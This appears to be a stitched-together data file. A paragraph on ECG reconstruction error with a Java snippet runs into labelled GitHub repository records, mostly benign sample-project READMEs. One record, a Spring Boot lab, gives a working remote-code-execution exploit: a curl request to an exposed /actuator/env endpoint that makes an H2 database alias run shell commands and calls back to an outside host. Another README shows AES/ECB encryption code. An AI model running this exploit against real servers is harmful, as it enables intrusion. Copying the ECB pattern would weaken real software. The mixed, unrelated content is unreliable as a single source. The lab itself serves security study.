The distribution of the reconstruction error in Figure 5 shows that the error is distinctly not normally distributed. Instead, the distribution of the error has longer tails than the normal distribution would have. Figure 6 shows a histogram of the error. The standard deviation of the error magnitude is about 5, but nearly 2% of the errors are larger than 15 (3 standard deviations). This is implausibly large for a normal distribution, which would have fewer than 0.3% of errors that large. Even more extreme, 50 samples per million are larger than 20 standard deviations. Scanning for errors greater than 100 takes us to a point 100 seconds into the recording where the error spikes sharply. Figure 7 shows the error and Figure 8 shows the original and reconstructed signal for this 5 second period. The reconstruction clearly isn't capturing the negative excursion of the original signal, but it isn't clear why. Figure 9 shows a magnified view of the 1 second right around the anomaly and we can see that the problem is a double beat. Scanning for more anomalies takes us to 240s into the trace where there is a clear signal acquisition malfunction as shown in Figures 10 and 11. The 64 most commonly used sub-sequence clusters are shown in Figure 12. The left-most column shows how translations of the same portion of the heartbeat show up as clusters in the signal dictionary. These patterns are scaled, shifted and added to reconstruct the original signal.
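The reconstruction-and-error idea can be sketched in a few lines of Java: each window of the signal is matched to its nearest cluster centroid, and the residual between the window and that centroid is the anomaly score. The class and centroid values below are illustrative only, not the repository's actual code:

```java
// Nearest-centroid reconstruction error, the core of the detector described above.
public class ReconstructionError {
    // Pick the centroid closest (in squared Euclidean distance) to the window.
    static double[] reconstruct(double[] window, double[][] centroids) {
        double best = Double.MAX_VALUE;
        double[] choice = centroids[0];
        for (double[] c : centroids) {
            double d = 0;
            for (int i = 0; i < window.length; i++) d += (window[i] - c[i]) * (window[i] - c[i]);
            if (d < best) { best = d; choice = c; }
        }
        return choice;
    }

    // L1 residual between the window and its reconstruction; large values flag anomalies.
    static double error(double[] window, double[][] centroids) {
        double[] r = reconstruct(window, centroids);
        double e = 0;
        for (int i = 0; i < window.length; i++) e += Math.abs(window[i] - r[i]);
        return e;
    }
}
```

A normal heartbeat window lands near some centroid and yields a small residual; a double beat or acquisition glitch matches nothing well and the residual spikes, exactly as in Figures 7 and 10.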
0
OhadR/authentication-flows
oAuth2 sample: auth-server, resource server and client. "Authentication-Flows" is also a sub-module here.
null
Authentication-Flows [![Build Status](https://travis-ci.org/OhadR/authentication-flows.svg?branch=master)](https://travis-ci.org/OhadR/authentication-flows) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.ohadr/authentication-flows/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.ohadr/authentication-flows) ============= The Authentication-Flows JAR implements all authentication flows: * create account, * forgot password, * change password by user request, * force change password if password is expired, * locks the account after a pre-configured number of login failures. [Its own README](https://github.com/OhadR/authentication-flows/tree/master/authentication-flows) explains in detail all required configurations, API and more. The authentication-flows JAR *uses cryptography* in order to encrypt the data in the links that are sent to the user's email, upon user's registration and "forgot password" flows. Read more about the encryption module [here](#jar-common-crypto---). This project *was* an oAuth2 POC, consisting of all 3 oAuth parties. The oAuth POC is now here: https://github.com/OhadR/oAuth2-sample 23-02-2016: Spring Versions Updated --------------------------- On 23-02-2016, we updated Spring versions to the newest! * Spring Security: 4.0.3.RELEASE * Spring: 4.2.4.RELEASE * Spring Security oAuth: 2.0.9.RELEASE In addition, we changed the build tool from Maven to **Gradle**. If you wish to use the older version, i.e. Maven and older Spring versions (3.1.X, oAuth 1.0.5), you can find it on a separate branch. The version in that branch is 1.6.2-SNAPSHOT (you can find the latest release, 1.6.2, in Maven Central). The version on Master is 2.0.0-SNAPSHOT. 
Other Project Components ================== JAR: common-crypto [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.ohadr/common-crypto/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.ohadr/common-crypto) - Both oAuth identity-provider and the authentication-flows JAR use cryptography in order to encrypt the data: - oAuth encrypts the access-token - authentication-flows encrypts the user's password, - authentication-flows encrypts the links that are sent to the user's email, upon user's registration and "forget password" flows. The utility JAR, called "common-crypto", makes life easier. You can find it in this project, and it is available in [Maven Central Repository](http://search.maven.org/#search%7Cga%7C1%7Ccommon-crypto) as well. See [its own README](https://github.com/OhadR/authentication-flows/tree/master/common-crypto). JAR: auth-common [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.ohadr.oauth2/auth-common/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.ohadr.oauth2/auth-common) ------------ common code for authentication. You can find it also in this project, and also it is available in Maven repository: ```xml <dependency> <groupId>com.ohadr</groupId> <artifactId>auth-common</artifactId> <version>2.1-RELEASE</version> </dependency> ``` Note the version - make sure you use the latest. KeyStore things to know: ======================== 1. a keystore shall be created, both for SSL and for signing the tokens. 2. its alias and password should be updated in the prop file as well as in the tomcat's server.xml 3. algorithm should be DSA (because in the access-token signature my code expects it to be "SHA1withDSA" 4. if you want to work with "localhost", you should make the name "localhost": 5. 
http://stackoverflow.com/questions/6908948/java-sun-security-provider-certpath-suncertpathbuilderexception-unable-to-find/12146838#12146838 Creating a keystore using Java's keytool: keytool.exe -genkeypair -alias <alias> -keypass <key-password> -keyalg DSA -keystore <file-name> -storepass <ks-password> -storetype JCEKS -v for example: C:\Dev\Tools>"%JAVA_HOME%\bin\keytool.exe" -genkeypair -alias alias -keypass kspass -keystore ohad.ks -storepass kspass -keyalg DSA -storetype JCEKS -v Note that your servlet container will have to be adapted to use this keystore (for https use). For example, if you used the command above to create the keystore, and you use tomcat, your server.xml file will have this section: ```xml <Connector port="8443" SSLEnabled="true" clientAuth="false" keystoreFile="c:\dev\tools\ohad.ks" keystorePass="kspass" keyAlias="alias" keystoreType="JCEKS" maxThreads="150" protocol="HTTP/1.1" scheme="https" secure="true" sslProtocol="TLS"/> ``` Java Encryption: ================ Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); SecretKeySpec secretKey = new SecretKeySpec(key, "AES"); cipher.init(Cipher.ENCRYPT_MODE, secretKey); String encryptedString = Base64.encodeBase64String(cipher.doFinal(strToEncrypt.getBytes())); return encryptedString; http://techie-experience.blogspot.co.il/2012/10/encryption-and-decryption-using-aes.html http://docs.oracle.com/javase/7/docs/api/javax/crypto/Cipher.html#init(int, java.security.Key) HTML forms: onSubmit vs action Why the "Secret Question" mechanism is a Bad Thing ------------------------- The logic of "Secret Question" escapes me. Since the dawn of computer security we have been telling people, "DON'T make a password that is information about yourself that a hacker could discover or guess, like the name of your high school, or your favorite color. 
A hacker might be able to look up the name of your high school, or even if they don't know you or know anything about you, if you still live near where you went to school they might get it by trying local schools until they hit it. There are a small number of likely favorite colors so a hacker could guess that. Etc. Instead, a password should be a meaningless combination of letters, digits, and punctuation." But now we also tell them, "But! If you have a difficult time remembering that meaningless combination of letters, digits, and punctuation, no problem! Take some information about yourself that you can easily remember -- like the name of your high school, or your favorite color -- and you can use that as the answer to a 'security question', that is, as an alternative password." Indeed, security questions make it even easier for the hacker than if you just chose a bad password to begin with. At least if you just used a piece of personal information for your password, a hacker wouldn't necessarily know what piece of personal information you used. Did you use the name of your dog? Your birth date? Your favorite ice cream flavor? He'd have to try all of them. But with security questions, we tell the hacker exactly what piece of personal information you used as a password! Instead of using security questions, why don't we just say, "In case you forget your password, it is displayed on the bottom of the screen. If you're trying to hack in to someone else's account, you are absolutely forbidden from scrolling down." It would be only slightly less secure. [source](http://stackoverflow.com/questions/2734367/implement-password-recovery-best-practice) Why should we NEVER use CAPTCHA ------------------------- Well, [here is why](http://webdesignledger.com/tips/why-you-should-stop-using-captchas).
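The Java Encryption snippet above can be completed into a runnable round-trip using only the JDK (java.util.Base64 in place of commons-codec). Note that AES/ECB, as used in the original snippet, leaks plaintext patterns and is generally discouraged; a mode with an IV such as CBC or GCM is preferable in practice:

```java
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Runnable version of the README's AES snippet, with the matching decrypt side.
public class AesRoundTrip {
    static String encrypt(String plain, byte[] key) throws Exception {
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"));
        return Base64.getEncoder().encodeToString(cipher.doFinal(plain.getBytes(StandardCharsets.UTF_8)));
    }

    static String decrypt(String encrypted, byte[] key) throws Exception {
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key, "AES"));
        return new String(cipher.doFinal(Base64.getDecoder().decode(encrypted)), StandardCharsets.UTF_8);
    }
}
```

The key must be 16, 24 or 32 bytes long (AES-128/192/256).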
0
manoelcampos/padroes-projetos
🤝📘☕️🧩 Design Patterns in Java with OO and functional-programming implementations, including modeling and realistic examples 😎
design-patterns fp functional-programming gof java object-oriented-programming oop padroes-de-projetos projects samples solid
null
0
spaceraccoon/spring-boot-actuator-h2-rce
Sample Spring Boot App Demonstrating RCE via Exposed env Actuator and H2 Database
null
# Spring Boot Actuator H2 RCE ## Introduction Writeup: [Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) This is a sample app based off the default Spring Boot app in Spring's [documentation](https://spring.io/guides/gs/spring-boot-docker/) that demonstrates how an attacker can achieve RCE on an instance with an exposed `/actuator/env` endpoint and a H2 database. ## Usage First, start the app. You can do this locally or with Docker. ### Local If you run this locally, you need JDK 1.8 or later and Maven 3.2+. `./mvnw package && java -jar target/gs-spring-boot-docker-0.1.0.jar` ### Docker 1. `sudo docker build -t spaceraccoon/spring-boot-rce-lab .` 2. `sudo docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab` The app is now running on `localhost:8080`. ### Exploit 1. (Modify the curl request accordingly) `curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl http://x.burpcollaborator.net\');\"}' 'http://localhost:8080/actuator/env'` 2. `curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'` You will receive a pingback.
1
hitherejoe/Pickr
A sample application demoing the Google Play Services Place Picker and Autocomplete
null
Pickr [![Build Status](https://travis-ci.org/hitherejoe/Pickr.svg?branch=master)](https://travis-ci.org/hitherejoe/Pickr) ===== <p align="center"> <img src="images/devices.png" alt="Device screenshots"/> </p> A simple demo application that demonstrates the use of the Place Picker and Autocomplete functionality found within Google Play Services. The project is setup using: - Functional tests with [Espresso](https://code.google.com/p/android-test-kit/wiki/Espresso) - Unit tests with [Robolectric](http://robolectric.org/) - [Google Play Services](https://developers.google.com/android/guides/overview) - [RxJava](https://github.com/ReactiveX/RxJava) and [RxAndroid](https://github.com/ReactiveX/RxAndroid) - [Retrofit](http://square.github.io/retrofit/) and [OkHttp](https://github.com/square/okhttp) - [Dagger 2](http://google.github.io/dagger/) - [SqlBrite](https://github.com/square/sqlbrite) - [EasyAdapter](https://github.com/ribot/easy-adapter) - [Butterknife](https://github.com/JakeWharton/butterknife) - [Timber](https://github.com/JakeWharton/timber) - [Mockito](http://mockito.org/) Requirements ------------ - [Android SDK](http://developer.android.com/sdk/index.html). - Android [5.1 (API 22)](http://developer.android.com/tools/revisions/platforms.html#5.1). - Android SDK Tools - Android SDK Build tools 23.0.1 - Android Support library 23.0.1 - Android Support Repository Building -------- To build, install and run a debug version, run this from the root of the project: ./gradlew installDebug Testing -------- For Android Studio to use syntax highlighting for Automated tests and Unit tests you **must** switch the Build Variant to the desired mode. To run **unit** tests on your machine using [Robolectric](http://robolectric.org/): ./gradlew testDebug To run **automated** tests on connected devices: ./gradlew connectedAndroidTest
1
android-cjj/JJSwipeLayout
The Sample Swipe Layout!
null
JJSwipeLayout ============================================= The Sample Swipe Layout! --------------------------------------------- Two well-known swipe-to-delete libraries are daimajia's [https://github.com/daimajia/AndroidSwipeLayout](https://github.com/daimajia/AndroidSwipeLayout) and Mr.Bao's [https://github.com/baoyongzhang/SwipeMenuListView](https://github.com/baoyongzhang/SwipeMenuListView). However, daimajia's library is extremely powerful; I used it before and hit a few small bugs, and with that much code I was too worn out to fix them myself. I found that if you don't need all of that and only want simple, QQ-style behavior, you can easily implement it yourself. Mr.Bao's library is for ListView, so if your project uses RecyclerView you would probably need major changes... So I reinvented the wheel; please forgive me for redoing what others have already written. I only implemented a single-direction SwipeLayout that works with both ListView and RecyclerView... Screenshot: ---------------------------------------- ![](https://camo.githubusercontent.com/df11f2a298e5c3aa843f63e81516cdb01e04e019/687474703a2f2f7777332e73696e61696d672e636e2f6d773639302f36313064633033346a7731656a703362736b36747667323039353032626a74632e676966) (Forgive me for shamelessly borrowing daimajia's animated GIF, haha) Base layout --------------------------- ![](https://github.com/android-cjj/JJSwipeLayout/blob/master/img/a.jpg) swipe for listview ------------------------------- ![](https://github.com/android-cjj/JJSwipeLayout/blob/master/img/b.jpg) swipe for recyclerview -------------------- ![](https://github.com/android-cjj/JJSwipeLayout/blob/master/img/c.jpg) Usage -------------------------------------------------- ```xml <com.cjj.swipe.JJSwipeLayout android:id="@+id/swipelayout" android:layout_width="match_parent" android:layout_height="wrap_content" xmlns:android="http://schemas.android.com/apk/res/android"> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:orientation="vertical" android:gravity="center" android:layout_width="match_parent" android:layout_height="80dp"> <!-- This layer is the content view; the wrapper around the content must be a ViewGroup, so it can also be a FrameLayout or RelativeLayout --> </LinearLayout> <LinearLayout android:id="@+id/bottom_wrapper_2" android:layout_width="210dp" android:layout_height="80dp"> <!-- This layer is the sliding menu view; add views for delete, like and other actions here --> </LinearLayout> </com.cjj.swipe.JJSwipeLayout> ``` See the sample source code for details; it's very simple to use. Other APIs 
------------------------------------------------------- jjSwipeLayout.isOpen() // checks whether the layout is open jjSwipeLayout.setOnSwipeBackListener() // listens for swipe events jjSwipeLayout.close() // closes the swipe layout jjSwipeLayout.open() // opens the swipe layout jjSwipeLayout.setAlphaAnim(true); // fades the menu in as it slides out If you want to support me, you can follow me on GitHub: https://github.com/android-cjj. License ======= The MIT License (MIT) Copyright (c) 2015 android-cjj Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
1
mechero/spring-boot-jboss-wildfly
Spring Boot application sample that can be deployed to a JBoss Wildfly application server
docker jboss spring-boot spring-mvc wildfly wildfly13
# Spring Boot - JBoss Wildfly demo app ## Description This is a sample project that shows how to deploy a `war` file with a Spring Boot 2 application on a Wildfly server, included in a post at [The Practical Developer site](https://thepracticaldeveloper.com/2017/09/02/how-to-deploy-a-spring-boot-war-in-wildfly-jboss/) ## Instructions You need to have a JDK 11 installed in your system. Then, run the script `docker-build.sh` (or the commands inside if you're in Windows) and you will generate an image with a sample Spring Boot application packaged in a war file and deployed to Wildfly and Tomcat. The complete instructions [are here](https://thepracticaldeveloper.com/2017/09/02/how-to-deploy-a-spring-boot-war-in-wildfly-jboss/).
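For orientation (the linked post has the authoritative steps), packaging a Spring Boot app as a deployable war generally involves switching the Maven packaging and marking the embedded container as provided, roughly like this pom.xml fragment (the artifact names shown are the standard Spring Boot ones; versions and this repo's exact pom may differ):

```xml
<packaging>war</packaging>

<dependencies>
    <!-- Keep the embedded Tomcat out of the war; Wildfly provides the container -->
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-tomcat</artifactId>
        <scope>provided</scope>
    </dependency>
</dependencies>
```

The application class also needs to extend `SpringBootServletInitializer` so the servlet container can bootstrap it.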
1
mobindustry/emojikeyboard
mobindustry - Sample of emoji keyboard
null
# EmojiKeyboard Telegram like implementation for emoticons that displays in the app as a pop-up over the soft keyboard ![Screenshot](https://github.com/frontiertsymbal/emoji_keyboard/blob/master/EmojiKeyboard.png) ### Requirements The library requires Android API Level 14+. ## Integration * Download and unzip the project you've just downloaded * Import the emojilib module in your Android Studio project (File > New > Import Module) * Add module to build.gradle ```groovy dependencies { compile project (':emojilib') } ``` * Enjoy! ## Usage You may use the code in two ways - with input panel and without it. ## Keyboard with input panel ### your_activity.xml Create container for input panel in your activity xml file ``` xml <FrameLayout android:id="@+id/root_frame_layout" android:layout_width="match_parent" android:layout_height="wrap_content" android:layout_gravity="bottom" > </FrameLayout> ``` ### YourActivity.java ``` java private FrameLayout mFrameLayout; private EmojiPanel mPanel; private EmojiParser mParser; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.your_activity); mFrameLayout = (FrameLayout) findViewById(R.id.root_frame_layout); //Create new panel, set the container in which the panel will be placed and set ClickCallback to receive Spanned string with emoji and path to sticker image. 
mPanel = new EmojiPanel(this, mFrameLayout, new EmojiPanel.EmojiClickCallback() { @Override public void sendClicked(Spannable span) { //do something with received Spannable with emoji } @Override public void stickerClicked(String path) { //do something with received path to Sticker image } }); //Set default icons for buttons mPanel.iconsInit(); //or if you need custom icons for buttons mPanel.iconsInit(R.drawable.ic_send_smile_levels, R.drawable.forward_blue); //initialise panel mPanel.init(); //if you need to parse a Spannable from a String with emoji mParser = mPanel.getParser(); Spannable parsedString = mParser.parse(textView.getText().toString()); } @Override protected void onPause() { super.onPause(); mPanel.dissmissEmojiPopup(); } @Override public void onBackPressed() { if(mPanel.isEmojiAttached()) { mPanel.dissmissEmojiPopup(); } else { super.onBackPressed(); } } ``` Create a level-list xml in drawable to customize icons for the smile/keyboard button ### ic_send_smile_levels.xml ``` xml <?xml version="1.0" encoding="utf-8"?> <level-list xmlns:android="http://schemas.android.com/apk/res/android"> <item android:drawable="@drawable/ic_msg_panel_kb" android:maxLevel="0"/> <item android:drawable="@drawable/doc_blue" android:maxLevel="1"/> </level-list> ``` These actions are enough to enable you to use the keyboard. ## Keyboard without input panel To use the keyboard, see the KeyboardActivity.java code in the sample project ## Current stickers To add your own stickers to the keyboard, put them in a /assets/stickers/ directory ###### Note This code has been carefully excised out of the project at https://github.com/rovkinmax/tchalange
1
marcfasel/SessionInCookie
Sample code to demonstrate the Session In Cookie pattern
null
# SessionInCookie Sample Application # This application is an implementation of the SessionInCookie pattern in Java. It has a CookieSessionFilter that serialises and deserialises the session attributes to and from a cookie. To demonstrate the functionality a sample SpringMVC application is included. Deploy the application to your favourite servlet container, and point your browser to [http://localhost:8080/SessionInCookie](http://localhost:8080/SessionInCookie "SessionInCookie"). The application allows you to log in, in which case a user object is placed in the session. You then proceed into the secured part of the application, which can only be viewed if a user is logged in and this user object is available in the session. This is controlled by a SecurityFilter, which issues an HTTP error 401 "Access denied" in case you are not logged in. The 401 page defined in the web.xml is shown in this case. The CookieSessionFilter is a base implementation of the pattern as shown in part of my [blog](http://blog.shinetech.com/2012/12/18/simple-session-sharing-in-tomcat-cluster-using-the-session-in-cookie-pattern/) on the Session-In-Cookie pattern. The project also contains an AdvancedSessionCookieFilter together with an AdvancedCookieSession. This filter also implements session timeouts, encryption, and signing of the cookie. These topics will be covered by the second part of my blog.
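The heart of the pattern can be sketched in plain Java: serialize the session attributes, Base64-encode them into a cookie value, and reverse the process on the next request. This is an illustrative codec only (the class name is made up); the real CookieSessionFilter must additionally respect cookie size limits, and the advanced variant adds encryption, signing, and timeouts:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

// Round-trips session attributes through a cookie-safe Base64 string.
public class CookieSessionCodec {
    static String encode(Map<String, Serializable> attrs) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(new HashMap<>(attrs)); // HashMap is Serializable
        }
        return Base64.getUrlEncoder().encodeToString(bytes.toByteArray());
    }

    @SuppressWarnings("unchecked")
    static Map<String, Serializable> decode(String cookieValue) throws IOException, ClassNotFoundException {
        byte[] bytes = Base64.getUrlDecoder().decode(cookieValue);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return (Map<String, Serializable>) in.readObject();
        }
    }
}
```

Because the whole session travels with each request, any node in a cluster can serve it without sticky sessions, which is the point of the pattern.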
1
elechantelepate/bip_hack
Sample app for hacking the BIP! card on the Santiago Public Transit system.
null
null
1
tomsquest/java-agent-asm-javassist-sample
Sample maven project containing a Java agent and examples of bytecode manipulation with ASM and Javassist
null
# Sample Java Agent and Bytecode manipulation Sample maven project containing a Java agent and examples of bytecode manipulation with ASM and Javassist. See article on my blog : http://tomsquest.com/blog/2014/01/intro-java-agent-and-bytecode-manipulation/ ## Build ``` $ # From the root dir $ mvn package ``` ## Run ``` $ # From the root dir $ java -javaagent:agent/target/agent-0.1-SNAPSHOT.jar -jar other/target/other-0.1-SNAPSHOT.jar ```
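For context, the agent half of such a project reduces to a class with a `premain` entry point that the JVM calls before `main`, wired up via a `Premain-Class` attribute in the jar manifest. A minimal sketch follows (class name hypothetical; a real agent would register a `ClassFileTransformer` that rewrites bytecode with ASM or Javassist):

```java
import java.lang.instrument.Instrumentation;

// Minimal java agent skeleton; loaded with -javaagent:agent.jar=args
public class MinimalAgent {
    static volatile String lastArgs; // captured only to make the sketch observable

    // The JVM invokes this before the application's main() method.
    public static void premain(String agentArgs, Instrumentation inst) {
        lastArgs = agentArgs;
        if (inst != null) {
            // A real agent registers a ClassFileTransformer here, e.g.:
            // inst.addTransformer(new MyAsmTransformer());
        }
    }
}
```

The jar manifest must contain `Premain-Class: MinimalAgent` (the maven-jar-plugin can add it) for the `-javaagent` flag to find this entry point.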
1
cscotta/recordinality
Implementation of 'Recordinality' cardinality estimation sketch with distinct value sampling
null
#### Cardinality Estimation and Distinct Value Sampling with Recordinality ###### C. Scott Andreas | Aug 19, 2013 **Cardinality Estimation** Determining the number of unique elements that make up a stream is a frequently-encountered problem in stream processing. A few applications include counting the number of unique visitors to a website or determining the number of unique hosts communicating with an application cluster. In both cases, the number can be arbitrarily large, making it infeasible to maintain a map containing each unique value and just counting the elements. Instead, we turn to a category of algorithms called "[sketches](http://blog.aggregateknowledge.com/2011/09/13/streaming-algorithms-and-sketches/)." Sketches help us estimate the cardinality of infinite streams using very little memory and with bounded error estimates. [HyperLogLog](http://blog.aggregateknowledge.com/2012/10/25/sketch-of-the-day-hyperloglog-cornerstone-of-a-big-data-infrastructure/) is an excellent choice for streaming cardinality estimation in most cases. However, HLL is simply an estimator - it is a tool that does one thing, and one thing very well. At Aggregate Knowledge's May SketchConf, Jérémie Lumbroso introduced me to another lesser-known sketch called "Recordinality." Here is [the paper](http://www-apr.lip6.fr/~lumbroso/Publications/HeLuMaVi12.pdf) describing it. **Recordinality** Recordinality is unique in that it provides cardinality estimation like HLL, but also offers "distinct value sampling." This means that Recordinality can allow us to fetch a random sample of distinct elements in a stream, invariant to repetition. Put more succinctly, given a stream of elements containing 1,000,000 occurrences of 'A' and one occurrence each of 'B' - 'Z', the probability of any letter appearing in our sample is equal. Moreover, we can also efficiently store the number of times elements in our distinct sample have been observed. 
This can help us to understand the distribution of occurrences of elements in our stream. With it, we can answer questions like "do the elements we've sampled present in a power law-like pattern, or is the distribution of occurrences relatively even across the set?"

**The Algorithm**

Beyond these unique properties, Recordinality is especially interesting due to its simplicity. Here's how it works:

1. Initialize a set of size k (the size of this set determines the accuracy of our estimates).
2. Compute the hash of each incoming element in the stream using a hash function such as [MurmurHash3](https://sites.google.com/site/murmurhash/).
3. If the k-set is not full, insert the hash value. If the set is full, determine whether the hash is greater than the lowest hash currently in the set. If so, replace the lowest hash with it. If not, ignore it.
4. Each time we add or replace an element in the k-set, increment a counter.

The premise is straightforward: the cardinality of a stream can be estimated by hashing each element to a random value and counting the number of times the set holding the k largest of these values is mutated. We gain distinct value sampling if we switch from a set to a map and store the original value in our k-set. We gain counts of unique values observed by storing both the original value and incrementing a counter each time it's observed. In addition to being easy to reason about, it's also extraordinarily efficient: the common case requires only hashing an element and comparing two integers.

**Implementing Recordinality**

Interest piqued, Jérémie challenged me over dinner to implement it. Armed with Timon's advice on "[how to implement a paper](http://taco.cat/files/Screen%20Shot%202013-08-19%20at%202.58.36%20PM-N2VAMCNBev.png)" ([slides](https://docs.google.com/presentation/d/12mMdn5cjA-MhrbJSP6ThjIAs-YACWJ1p6BeSTXW0P4Q/edit?usp=sharing)), I read and re-read it, making notes.
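The four steps described above translate almost directly into code. Here is a minimal Python sketch of the idea; the class name, the use of SHA-1 as a stand-in for MurmurHash3, and the estimator formula `k * (1 + 1/k)^(R - k + 1) - 1` from the paper are my own choices for illustration, not the author's reference implementation:

```python
import hashlib


class RecordinalitySketch:
    """Minimal Recordinality sketch: keeps the k largest hashes seen,
    the original values that produced them, and their observation counts."""

    def __init__(self, k):
        self.k = k
        self.entries = {}   # hash -> [original value, times observed]
        self.records = 0    # number of inserts/replacements ("k-records")

    def _hash(self, value):
        # The post suggests MurmurHash3; SHA-1 stands in here to stay stdlib-only.
        return int.from_bytes(hashlib.sha1(value.encode("utf-8")).digest()[:8], "big")

    def observe(self, value):
        h = self._hash(value)
        if h in self.entries:               # already sampled: bump its count
            self.entries[h][1] += 1
        elif len(self.entries) < self.k:    # k-set not yet full: insert
            self.entries[h] = [value, 1]
            self.records += 1
        else:                               # full: replace the lowest hash if beaten
            lowest = min(self.entries)
            if h > lowest:
                del self.entries[lowest]
                self.entries[h] = [value, 1]
                self.records += 1

    def estimate(self):
        # Estimator from the paper, meaningful once more than k distinct
        # values have been seen: E[n] ~= k * (1 + 1/k)^(R - k + 1) - 1,
        # where R is the number of k-records observed so far.
        return self.k * (1.0 + 1.0 / self.k) ** (self.records - self.k + 1) - 1

    def sample(self):
        # Distinct value sample with per-value observation counts.
        return [(value, count) for value, count in self.entries.values()]
```

Feeding the sketch a stream with heavy repetition leaves the sample unbiased toward the repeated values, which is the "distinct value sampling" property described above.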
A Saturday morning found me at [Sightglass](https://sightglasscoffee.com/) sitting down with the paper, a cup of Blueboon, and my laptop to begin implementation. One cup and a couple of bugs later, I arrived at a working implementation of Recordinality and shuffled home to verify my results against those claimed by the paper on a known input set, which matched. Here's an implementation of Recordinality in Java, comments added:

https://github.com/cscotta/recordinality/blob/master/src/main/java/com/cscotta/recordinality/Recordinality.java

This implementation is both threadsafe and lockless in the common case, allowing all mutators and readers safe concurrent access without synchronization. If cardinality estimation with distinct value sampling is of interest to you, please consider this implementation as a starting point. Translations to other languages should be straightforward; please let me know if you attempt one and I'll list it here.

**Performance**

The Recordinality paper includes mean cardinality and error estimates for k-values from 4 to 512 against a publicly-available dataset, namely the text of A Midsummer Night's Dream. Here is a comparison of the results included in the paper versus those emitted by the unit test included with this implementation. The values recorded below are the results of 10,000 runs.

[Note: The source text used in the paper is listed as containing 3031 distinct words. The copy I've obtained from Project Gutenberg for verification, and on which the implementation stats below are based, contained 3193 distinct words. It is included in this repository.]
| Size | Paper Mean (Expected: 3031) | Paper Error | Impl Mean (Expected: 3193) | Impl Error | Mean Run Time |
|------|-----------------------------|-------------|----------------------------|------------|---------------|
| 4    | 2737 | 1.04 | 3154 | 1.63 | 3ms |
| 8    | 2811 | 0.73 | 3187 | 0.91 | 3ms |
| 16   | 3040 | 0.54 | 3202 | 0.55 | 3ms |
| 32   | 3010 | 0.34 | 3179 | 0.34 | 3ms |
| 64   | 3020 | 0.22 | 3197 | 0.22 | 3ms |
| 128  | 3042 | 0.14 | 3193 | 0.13 | 4ms |
| 256  | 3044 | 0.08 | 3191 | 0.08 | 4ms |
| 512  | 3043 | 0.04 | 3192 | 0.04 | 4ms |

You can run this test yourself by cloning the repo and typing `mvn test`. Here is an example of the expected output: https://gist.github.com/pkwarren/6275129

**Epilogue**

The implementation of Recordinality was driven by practical needs as much as by a desire to encourage greater cross-pollination between industry and academia. This is the first open source implementation of this algorithm I'm aware of, and the only cardinality estimation sketch that provides distinct value sampling along with the frequency of each sampled element. Working with Jérémie to understand and implement Recordinality was a pleasure (as most evenings talking shop that end at 2 am at Pilsner Inn are)! It's always a delight to see unique and useful algorithms spawn open source implementations for use by others coming after. Thanks, Jérémie!

---

Here are the [slides](https://speakerdeck.com/timonk/philippe-flajolets-contribution-to-streaming-algorithms) presented by Jérémie, along with a [video of the original presentation](http://www.youtube.com/watch?v=Xigaf8npHoI).

**Update:** Thanks to Philip Warren (@pkwarren) for catching a check against CSLM.size() that should have been short-circuited by a call to cachedMin.get() in the common case. The run time stats and performance figures above have been updated following this change. A few more similar changes will follow shortly.
**Update 2:** A much bigger thanks to Philip for [this commit](https://github.com/cscotta/recordinality/commit/a5579fa6909ee0746d4da9da0efcd6b924a260cc), which removes the use of CSLM.size() entirely. Previously, this implementation's time complexity varied with the size of the k-map; this commit eliminates that covariance. The initial version of this test took a mean of 116ms per run at k=512. Philip's changes bring it down to 4ms.
0
